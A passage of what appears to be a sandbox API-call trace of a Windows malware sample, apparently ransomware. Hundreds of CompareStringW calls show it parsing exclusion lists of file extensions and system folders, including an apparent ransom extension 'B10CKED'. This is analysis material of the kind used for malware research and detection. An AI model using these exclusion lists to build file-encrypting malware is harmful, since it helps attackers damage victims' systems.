[0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 